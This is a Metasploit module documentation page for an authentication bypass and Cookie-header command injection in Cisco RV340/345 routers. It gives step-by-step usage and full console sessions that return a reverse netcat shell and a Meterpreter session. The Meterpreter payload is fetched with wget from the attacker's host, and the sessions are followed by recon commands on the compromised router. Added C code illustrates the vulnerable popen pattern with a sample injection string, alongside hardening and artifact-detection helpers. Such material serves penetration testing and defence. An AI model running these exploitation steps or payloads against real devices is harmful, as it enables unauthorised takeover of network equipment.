Cisco Small Business RV Series Authentication Bypass and Command Injection - Metasploit


This page contains detailed information about how to use the exploit/linux/http/cisco_rv_series_authbypass_and_rce Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco Small Business RV Series Authentication Bypass and Command Injection
Module: exploit/linux/http/cisco_rv_series_authbypass_and_rce
Source code: modules/exploits/linux/http/cisco_rv_series_authbypass_and_rce.rb
Disclosure date: 2021-04-07
Last modification time: 2022-01-29 18:56:53 +0000
Supported architecture(s): cmd, armle
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-1472, CVE-2021-1473

This module exploits an authentication bypass (CVE-2021-1472) and a command injection (CVE-2021-1473) in the Cisco Small Business RV series of VPN/routers. The device does not adequately verify the credentials in the HTTP Authorization header when requests are made to the /upload endpoint. The upload.cgi binary then uses the contents of the HTTP Cookie header as part of a curl request to an internal endpoint. That curl command is executed with popen, which runs it through /bin/sh, so an attacker can inject additional shell commands via the Cookie header. A remote, unauthenticated attacker using this module achieves code execution as www-data, the user the web stack runs as, not root. The module targets the RV340, RV340w, RV345, and RV345P running firmware versions 1.0.03.20 and below.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Module leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/cisco_rv_series_authbypass_and_rce
msf exploit(cisco_rv_series_authbypass_and_rce) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Description

This module exploits an authentication bypass (CVE-2021-1472) and a command injection (CVE-2021-1473) in the Cisco Small Business RV series of VPN/routers. The device does not adequately verify the credentials in the HTTP Authorization header when requests are made to the /upload endpoint. The upload.cgi binary then uses the contents of the HTTP Cookie header as part of a curl request to an internal endpoint. That curl command is executed with popen, which runs it through /bin/sh, so an attacker can inject additional shell commands via the Cookie header.

A remote, unauthenticated attacker using this module achieves code execution as www-data, the user the nginx/uwsgi web stack runs as, not root.

The module targets the RV340, RV340w, RV345, and RV345P running firmware versions 1.0.03.20 and below.
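The following is an added illustration of the CVE-2021-1473 bug class described above; it is not the code of upload.cgi and not part of the module. It reconstructs the pattern the description gives (an attacker-controlled Cookie header formatted into a curl command line that is handed to popen(3), i.e. to /bin/sh -c) next to a hardened form that allow-lists the value and executes curl without a shell. The command shape is modelled on the truncated `sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie 'se` process visible in the ps listing later on this page; the cookie name and the name=value format are assumptions.

```c
/* Added illustration of the popen()-based command injection class (CVE-2021-1473).
 * NOT the actual upload.cgi code. Command shape modelled on the truncated
 * "sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie '..." line from the ps
 * listing on this page; cookie name/format ("sid=...") is an assumption. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define INTERNAL_URL "http://127.0.0.1/jsonrpc.cgi"

/* VULNERABLE PATTERN: the header value is formatted into a shell command
 * string. A single quote inside the cookie closes the quoted argument and
 * everything after it is parsed by /bin/sh as further commands. */
int build_curl_command_vulnerable(const char *cookie, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "curl " INTERNAL_URL " --cookie '%s'", cookie);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* popen() is "/bin/sh -c <cmd>", so whatever the cookie contains is
 * interpreted by the shell. Returns pclose()'s status, or -1 on error. */
int run_curl_vulnerable(const char *cookie)
{
    char cmd[1024];
    char buf[256];
    if (build_curl_command_vulnerable(cookie, cmd, sizeof cmd) != 0)
        return -1;
    FILE *fp = popen(cmd, "r");
    if (fp == NULL)
        return -1;
    while (fgets(buf, sizeof buf, fp) != NULL)
        ;                                   /* discard the response body */
    return pclose(fp);
}

/* HARDENED, step 1: allow-list the value before using it anywhere. A session
 * cookie for an internal RPC call has the shape name=value; restrict both
 * sides to [A-Za-z0-9_-] so quotes, ';', '`', '$', '|' and whitespace are
 * rejected outright. */
int cookie_is_wellformed(const char *cookie)
{
    const char *eq = strchr(cookie, '=');
    if (eq == NULL || eq == cookie || eq[1] == '\0')
        return 0;
    for (const char *p = cookie; *p != '\0'; p++) {
        if (p == eq)
            continue;
        if (!isalnum((unsigned char)*p) && *p != '_' && *p != '-')
            return 0;
    }
    return 1;
}

/* HARDENED, step 2: never involve a shell. fork()+execvp() passes the cookie
 * as one argv element, so shell metacharacters are just bytes to curl.
 * Returns curl's exit status, -1 on rejection or error. */
int run_curl_hardened(const char *cookie)
{
    if (!cookie_is_wellformed(cookie))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "curl", INTERNAL_URL, "--cookie", (char *)cookie, NULL };
        execvp("curl", argv);
        _exit(127);                         /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[1024];
    const char *attacker = "sid=a'; id; echo '";   /* constructed injection value */
    build_curl_command_vulnerable(attacker, cmd, sizeof cmd);
    printf("vulnerable shell string: %s\n", cmd);
    printf("hardened accepts it: %d\n", cookie_is_wellformed(attacker));
    return 0;
}
```

The two hardening steps are independent: the allow-list alone still leaves a shell in the path, and execvp alone still passes arbitrary bytes to curl, so both are applied. Quoting the value inside the format string (as the vulnerable builder does) is not a fix, since a single quote in the input ends the quoted region.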

Installation

The Cisco Small Business RV Series VPN/Router is a physical device and is not known to have been successfully emulated. If you have a device, the affected firmware (1.0.03.20) can be downloaded here:

  • https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.20?catid=268437899

Verification Steps


  • Acquire an affected device and configure it with the affected firmware
  • Do: use exploit/linux/http/cisco_rv_series_authbypass_and_rce
  • Do: set RHOST <ip>
  • Do: check
  • Verify the remote target is flagged as likely vulnerable
  • Do: set LHOST <ip>
  • Do: exploit
  • You should get a reverse shell.

Targets


0: Unix Command

Targets the VPN/router with a cmd/unix payload (cmd/unix/reverse_netcat by default) and returns a command shell.

1: Linux Dropper

Stages a linux/armle Meterpreter through the command stager. The stager fetches the payload with wget by default; curl also works (set CMDSTAGER::FLAVOR curl). The injection itself should succeed every time against a vulnerable host. However, at the time of writing, Meterpreter crashes about 50% of the time after being downloaded by the initial payload.

Options


TARGETURI

Specifies base URI. The default value is /.

Scenarios


Cisco RV340 running firmware 1.0.03.20: Meterpreter session via target 1 (Linux Dropper).

msf6 > use exploits/linux/http/cisco_rv_series_authbypass_and_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set LHOST 10.0.0.6
LHOST => 10.0.0.6
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set target 1
target => 1
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > run

[*] Started reverse TCP handler on 10.0.0.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/RIwkKfR
[*] Local IP: http://10.0.0.6:8080/RIwkKfR
[*] Client 10.0.0.8 (Wget) requested /RIwkKfR
[*] Sending payload to 10.0.0.8 (Wget)
[*] Sending stage (903400 bytes) to 10.0.0.8
[+] Exploit successfully executed.
[*] Meterpreter session 1 opened (10.0.0.6:4444 -> 10.0.0.8:34201 ) at 2022-01-29 18:48:24 -0800
[*] Command Stager progress - 100.00% done (108/108 bytes)
[*] Server stopped.

meterpreter > shell
Process 2545 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux router0B874A 4.1.8 #2 SMP Thu Sep 17 09:26:06 IST 2020 armv7l GNU/Linux
ps faux
    1 root      2476 S    /sbin/procd
    2 root         0 SW   [kthreadd]
    3 root         0 SW   [ksoftirqd/0]
    5 root         0 SW<  [kworker/0:0H]
    6 root         0 SW   [kworker/u4:0]
    7 root         0 SW   [rcu_sched]
    8 root         0 SW   [rcu_bh]
    9 root         0 SW   [migration/0]
   10 root         0 SW   [migration/1]
   11 root         0 SW   [ksoftirqd/1]
   12 root         0 SW   [kworker/1:0]
   13 root         0 SW<  [kworker/1:0H]
   14 root         0 SW<  [khelper]
   15 root         0 SW<  [perf]
   16 root         0 SW   [kworker/u4:1]
  242 root         0 SW<  [writeback]
  243 root         0 SW<  [crypto]
  245 root         0 SW   [kworker/0:1]
  246 root         0 SW<  [bioset]
  247 root         0 SW<  [kblockd]
  301 root         0 SW   [kswapd0]
  338 root         0 SW   [scsi_eh_0]
  339 root         0 SW<  [scsi_tmf_0]
  342 root         0 SW   [scsi_eh_1]
  343 root         0 SW<  [scsi_tmf_1]
  381 nobody    1968 S    /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf
  467 root         0 SW<  [dwc_otg]
  468 root         0 SW   [kworker/1:2]
  471 root         0 SW<  [ipv6_addrconf]
  545 root         0 SW<  [deferwq]
  550 root         0 SW   [ubi_bgt0d]
  553 root         0 SW   [ubifs_bgt0_0]
  851 root      1752 S    /sbin/ubusd
 1006 root      1772 S    /sbin/askfirst /bin/login
 2378 root         0 SW   [yaffs-bg-1]
 2380 root         0 SW   [yaffs-bg-1]
 2382 root         0 SW   [yaffs-bg-1]
 2384 root         0 SW   [yaffs-bg-1]
 2402 root         0 DW   [pfe_ctrl_timer]
 2518 www-data  1060 S    /tmp/jUehMqxi
 2536 root         0 SW   [ocf_0]
 2537 root         0 SW   [ocf_ret_0]
 2538 root         0 SW   [ocf_1]
 2539 root         0 SW   [ocf_ret_1]
 2545 www-data  3116 S    /bin/sh
 2623 root      2984 S    sleep 5
 2624 www-data  3228 R    ps faux
 2710 root         0 SW   [ocf-random]
 2821 root         0 SW<  [abm_wq]
 2990 root         0 SW   [pptp_th_1]
 3180 root      1796 S    /sbin/hotplug2 --override --persistent --set-rules-f
 3259 root         0 DW   [c2krv340_reset]
 4318 root     18112 S    /usr/bin/xosdsd
 4484 root      3116 S    {ch_agent_monito} /bin/sh /usr/bin/ch_agent_monitor
 4488 root      135m S    /usr/bin/call_home_agent -c /etc/license/ch_config
 4637 root      3116 S    {smart_agent_mon} /bin/sh /usr/bin/smart_agent_monit
 4645 root     69976 S    /usr/bin/smart_agent -c /mnt/license -i /etc/license
 5056 root      1652 S    rtupd
 5070 root      2408 S    /sbin/netifd
 5482 root     43952 S    /usr/lib/confd/erts/bin/confd -K false -B -MHe true
 5561 root      6632 S    ucicfg_init -c /tmp/etc/config/ -m /mnt/configcert/c
 5588 root      6636 S    ucicfg_hook
 5712 root      6640 S    ucicfg_network -c /tmp/etc/config/ -m /mnt/configcer
 5728 root      6640 S    ucicfg_security -c /tmp/etc/config/ -m /mnt/configce
 5752 root      6640 S    ucicfg_system -c /tmp/etc/config/ -m /mnt/configcert
 6554 root         0 SW   [kworker/0:2]
 6662 root      6896 S    operdb_stats
 6663 root     14112 S    opsdb_cisco
 6915 root      6636 S    ucicfg_aaa
 7034 root      6636 S    ucicfg_license
 7057 www-data  6740 S    webcache
 7133 root      3116 S    udhcpc -p /var/run/udhcpc-eth0.pid -s /lib/netifd/dh
 7135 root      3116 S    udhcpc -p /var/run/udhcpc-eth2.pid -s /lib/netifd/dh
 7199 root      3308 S    ntpd -d -p 0.ciscosb.pool.ntp.org -p 1.ciscosb.pool.
 7281 network   3024 S    /usr/sbin/zebra -d
 7285 network   2816 S    /usr/sbin/ripd -d
 7289 network   2800 S    /usr/sbin/ripngd -d
 7295 root      2520 S    /usr/sbin/watchquagga -d -z -T 60 -R /usr/sbin/quagg
 7843 root      2112 S    /usr/sbin/dropbear -F -P /var/run/dropbear.1.pid -p
 8188 root      3116 S    {mwan3track} /bin/sh /usr/sbin/mwan3track wan1 eth2 
 8296 root     30504 S    /usr/bin/cmm -f /etc/config/fastforward
 8668 root      1808 S    xl2tpd
 9889 root     16316 S    /usr/bin/python /usr/lib/python2.7/site-packages/pnp
10630 root      9072 S <  decomp_server
10632 root     12948 S    casa
10684 root      1884 S    lcavc
10750 root     14248 S    lcstat daemon
10851 root      2152 S    /usr/sbin/lldpd -I eth3*
10857 root     10124 S    /usr/sbin/lldpd -I eth3*
10873 root     80496 S    wfapp 50001 42 1 0 0 RV340-WB PSZ24161FA9
10986 root      6216 S    {vpnTimer} /usr/bin/perl -w /usr/sbin/vpnTimer
10987 root      6084 S    {vpnLed} /usr/bin/perl -w /usr/sbin/vpnLed
11055 root      3432 S    /usr/lib/ipsec/starter --daemon charon
11056 root      137m S    /usr/lib/ipsec/charon --use-syslog --debug-chd 2 --d
11058 root     16316 S    /usr/bin/python /usr/lib/python2.7/site-packages/pnp
12037 root      4624 S    notifyd -i 127.0.0.1
12055 root     16212 S    nginx: master process /usr/sbin/nginx
12065 www-data  7456 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12066 www-data  7124 S    uwsgi -m --ini /etc/uwsgi/blockpage.ini
12067 www-data  7124 S    uwsgi -m --ini /etc/uwsgi/upload.ini
12111 www-data  7216 S    uwsgi -m --ini /etc/uwsgi/upload.ini
12112 www-data  7548 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12113 www-data  7548 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12114 www-data  7124 S    uwsgi -m --ini /etc/uwsgi/blockpage.ini
12115 www-data  7548 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12116 www-data  7548 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12444 root     24804 S    /usr/bin/snmpglue -n 1
12794 root      3224 S    /usr/sbin/crond -c /mnt/configcert/crontabs -l 5
14266 root      5128 S    {syslog-ng} supervising syslog-ng
14267 root      5480 S    /usr/sbin/syslog-ng -f /tmp/syslog-ng.conf
28966 www-data  3116 S    sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie 'se
28967 www-data  3116 S    sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie 'se
28969 www-data  3116 S    nc 10.0.0.6 4444
28970 www-data  3116 S    /bin/sh
30804 nobody    2676 S    avahi-daemon: running [router0B874A.local]
30855 www-data 16372 S    nginx: worker process
30856 www-data 16212 S    nginx: worker process
30857 www-data 16212 S    nginx: worker process
30858 www-data 16368 S    nginx: worker process
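The process listing above shows the artifacts this module leaves on the router: the staged Meterpreter running as www-data out of /tmp (PID 2518), the netcat connect-back to the handler (PID 28969), and shells under the web user, including the two `sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie '...` processes that are the injected command's parents. The following is an added triage helper, not part of the module or the device firmware: it parses BusyBox-style ps rows (PID USER VSZ STAT COMMAND) and flags those patterns. The sample rows are a constructed subset copied from the listing above; the "www-data" user and the /tmp, nc and sh indicators are taken from it as well.

```c
/* Added triage helper for post-exploitation artifacts, not part of the
 * module or the firmware. Parses BusyBox `ps` rows and flags www-data
 * processes that match what the session above left behind. */
#include <stdio.h>
#include <string.h>

#define MAX_FIELD 32

struct proc {
    int pid;
    char user[MAX_FIELD];
    char stat[MAX_FIELD];
    const char *cmd;            /* points into the original line */
};

enum {
    SUSP_TMP_EXEC      = 1,     /* executable image under /tmp (dropped payload) */
    SUSP_NETCAT        = 2,     /* nc with host/port: connect-back or bind shell */
    SUSP_SHELL_WEBUSER = 4      /* interactive or -c shell as the web user */
};

/* Parse one `ps` row ("PID USER VSZ STAT COMMAND..."). Returns 0 on success,
 * -1 if the line is not a process row (e.g. a header). */
int parse_ps_line(const char *line, struct proc *p)
{
    char vsz[MAX_FIELD];
    int consumed = 0;
    if (sscanf(line, "%d %31s %31s %31s %n", &p->pid, p->user, vsz, p->stat, &consumed) != 4)
        return -1;
    p->cmd = line + consumed;
    return (*p->cmd != '\0') ? 0 : -1;
}

/* Bitmask of SUSP_* reasons; 0 means nothing to report. Only the web server
 * user is considered, because that is the user the injected command runs as.
 * A `sh -c curl ...` under www-data is upload.cgi's own code path and may be
 * legitimate during an upload, so SUSP_SHELL_WEBUSER is a lead, not proof. */
int classify(const struct proc *p)
{
    int flags = 0;
    if (strcmp(p->user, "www-data") != 0)
        return 0;
    if (strncmp(p->cmd, "/tmp/", 5) == 0)
        flags |= SUSP_TMP_EXEC;
    if (strncmp(p->cmd, "nc ", 3) == 0 || strstr(p->cmd, "/nc ") != NULL)
        flags |= SUSP_NETCAT;
    if (strcmp(p->cmd, "/bin/sh") == 0 || strncmp(p->cmd, "sh -c ", 6) == 0)
        flags |= SUSP_SHELL_WEBUSER;
    return flags;
}

/* Scan rows; writes up to max (pid, flags) pairs and returns the number flagged. */
int scan_ps(const char *const *lines, size_t nlines, int *pids, int *flags, size_t max)
{
    int hits = 0;
    for (size_t i = 0; i < nlines && (size_t)hits < max; i++) {
        struct proc p;
        if (parse_ps_line(lines[i], &p) != 0)
            continue;
        int f = classify(&p);
        if (f != 0) {
            pids[hits] = p.pid;
            flags[hits] = f;
            hits++;
        }
    }
    return hits;
}

/* Constructed sample: a subset of the `ps faux` listing shown above. */
static const char *const SAMPLE_PS[] = {
    "    1 root      2476 S    /sbin/procd",
    "    2 root         0 SW   [kthreadd]",
    "  2518 www-data  1060 S    /tmp/jUehMqxi",
    "  2545 www-data  3116 S    /bin/sh",
    "  7057 www-data  6740 S    webcache",
    " 12067 www-data  7124 S    uwsgi -m --ini /etc/uwsgi/upload.ini",
    " 28966 www-data  3116 S    sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie 'se",
    " 28969 www-data  3116 S    nc 10.0.0.6 4444",
    " 28970 www-data  3116 S    /bin/sh",
    " 30855 www-data 16372 S    nginx: worker process",
};
#define SAMPLE_PS_COUNT (sizeof SAMPLE_PS / sizeof SAMPLE_PS[0])

int main(void)
{
    int pids[16], flags[16];
    int n = scan_ps(SAMPLE_PS, SAMPLE_PS_COUNT, pids, flags, 16);
    for (int i = 0; i < n; i++)
        printf("pid %5d flags 0x%x\n", pids[i], flags[i]);
    return 0;
}
```

On the sample the benign www-data processes (webcache, the uwsgi workers, the nginx workers) are not flagged; the dropped /tmp binary, the nc connect-back and the three shells are. On a live device the same rows come from `ps` over the dropbear SSH service the listing shows running, and the flagged PIDs can then be walked up the parent chain to the uwsgi upload worker.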

Cisco RV340 running firmware 1.0.03.20: command shell via target 0 (Unix Command) with the default cmd/unix/reverse_netcat payload.

msf6 > use exploits/linux/http/cisco_rv_series_authbypass_and_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set LHOST 10.0.0.6
LHOST => 10.0.0.6
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > run

[*] Started reverse TCP handler on 10.0.0.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Unix Command for cmd/unix/reverse_netcat
[*] Command shell session 1 opened (10.0.0.6:4444 -> 10.0.0.8:34155 ) at 2022-01-29 18:46:01 -0800
[+] Exploit successfully executed.

uname -a
Linux router0B874A 4.1.8 #2 SMP Thu Sep 17 09:26:06 IST 2020 armv7l GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
netstat -tlpn
netstat: showing only processes with your user ID
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:12321         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8866          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8008          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9001          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2601            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2602            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9003          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2603            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:54316         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      30855/nginx: worker
tcp        0      0 127.0.0.1:2001          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9010          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4565          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:2103          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:47864         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      30855/nginx: worker
tcp        0      0 0.0.0.0:830             0.0.0.0:*               LISTEN      -
tcp        0      0 :::2601                 :::*                    LISTEN      -
tcp        0      0 :::2602                 :::*                    LISTEN      -
tcp        0      0 :::2603                 :::*                    LISTEN      -
tcp        0      0 :::80                   :::*                    LISTEN      30855/nginx: worker
tcp        0      0 :::53                   :::*                    LISTEN      -
tcp        0      0 :::22                   :::*                    LISTEN      -
tcp        0      0 :::443                  :::*                    LISTEN      30855/nginx: worker
tcp        0      0 :::830                  :::*                    LISTEN      -

Cisco RV340 running firmware 1.0.03.21 (outside the affected range): the check reports the target is not exploitable and no exploitation is attempted.

[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > check

[*] 10.0.0.8:443 - The target is not exploitable. The target did not respond with a 200 OK.
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > 


Msfconsole Usage


Here is how the linux/http/cisco_rv_series_authbypass_and_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/cisco_rv_series_authbypass_and_rce

[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show info

       Name: Cisco Small Business RV Series Authentication Bypass and Command Injection
     Module: exploit/linux/http/cisco_rv_series_authbypass_and_rce
   Platform: Unix, Linux
       Arch: cmd, armle
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-04-07

Provided by:
  Takeshi Shiomitsu
  jbaines-r7

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Me
                                        tasploit
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loc
                                        al machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 1 characters

Description:
  This module exploits an authentication bypass (CVE-2021-1472) and 
  command injection (CVE-2021-1473) in the Cisco Small Business RV 
  series of VPN/routers. The device does not adequately verify the 
  credentials in the HTTP Authorization field when requests are made 
  to the /upload endpoint. Then the upload.cgi binary will use the 
  contents of the HTTP Cookie field as part of a `curl` request aimed 
  at an internal endpoint. The curl request is executed using `popen` 
  and allows the attacker to inject commands via the Cookie field. A 
  remote and unauthenticated attacker using this module is able to 
  achieve code execution as `www-data`. This module affects the RV340, 
  RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and 
  below.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-1472
  https://nvd.nist.gov/vuln/detail/CVE-2021-1473
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx
  https://seclists.org/fulldisclosure/2021/Apr/39
  https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/

Module Options


This is a complete list of options available in the linux/http/cisco_rv_series_authbypass_and_rce exploit:

msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show options

Module options (exploit/linux/http/cisco_rv_series_authbypass_and_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
                                         etasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                         cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix Command

Advanced Options


Here is a complete list of advanced options supported by the linux/http/cisco_rv_series_authbypass_and_rce exploit:

msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show advanced

Module advanced options (exploit/linux/http/cisco_rv_series_authbypass_and_rce):

   Name                    Current Setting                  Required  Description
   ----                    ---------------                  --------  -----------
   AllowNoCleanup          false                            no        Allow exploitation without the possibility of cleaning
                                                                       up files
   AutoCheck               true                             no        Run check before exploit
   CMDSTAGER::DECODER                                       no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                             no        The CMD Stager to use. (Accepted: auto, wget, curl)
   CMDSTAGER::SSL          false                            no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                          no        Writable directory for staged files
   ContextInformationFile                                   no        The information file that contains context information
   DOMAIN                  WORKSTATION                      yes       The domain to use for Windows authentication
   DigestAuthIIS           true                             no        Conform to IIS, should work for most servers. Only set
                                                                       to false for non-IIS servers
   DisablePayloadHandler   false                            no        Disable the handler code for the selected payload
   EXE::Custom                                              no        Use custom exe instead of automatically generating a p
                                                                      ayload exe
   EXE::EICAR              false                            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                            no        Use the default template in case the specified one is
                                                                      missing
   EXE::Inject             false                            no        Set to preserve the original EXE function
   EXE::OldMethod          false                            no        Set to use the substitution EXE generation method.
   EXE::Path                                                no        The directory in which to look for the executable temp
                                                                      late
   EXE::Template                                            no        The executable template file name.
   EnableContextEncoding   false                            no        Use transient context when encoding payloads
   FileDropperDelay                                         no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                             no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                            no        Override check result
   HttpClientTimeout                                        no        HTTP connection and receive timeout
   HttpPassword                                             no        The HTTP password to specify for authentication
   HttpRawHeaders                                           no        Path to ERB-templatized raw headers to append to exist
                                                                      ing headers
   HttpTrace               false                            no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                          no        HTTP request and response colors for HttpTrace (unset
                                                                      to disable)
   HttpTraceHeadersOnly    false                            no        Show HTTP headers only in HttpTrace
   HttpUsername                                             no        The HTTP username to specify for authentication
   ListenerComm                                             no        The specific communication channel to use for this ser
                                                                      vice
   MSI::Custom                                              no        Use custom msi instead of automatically generating a p
                                                                      ayload msi
   MSI::EICAR              false                            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                no        The directory in which to look for the msi template
   MSI::Template                                            no        The msi template file name
   MSI::UAC                false                            no        Create an MSI with a UAC prompt (elevation to SYSTEM i
                                                                      f accepted)
   SSLCipher                                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "
                                                                      ADH"
   SSLCompression          false                            no        Enable SSL/TLS-level compression
   SSLVersion              Auto                             yes       Specify the version of SSL/TLS to be used (Auto, TLS a
                                                                      nd SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL
                                                                      23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                            no        Return a robots.txt file if asked for one
   URIHOST                                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                                  no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/5.0 (Macintosh; Intel M  no        The User-Agent header to use for all requests
                           ac OS X 12.0; rv:94.0) Gecko/20
                           100101 Firefox/94.0
   VERBOSE                 false                            no        Enable detailed status messages
   WORKSPACE                                                no        Specify the workspace for this module
   WfsDelay                2                                no        Additional delay in seconds to wait for a session

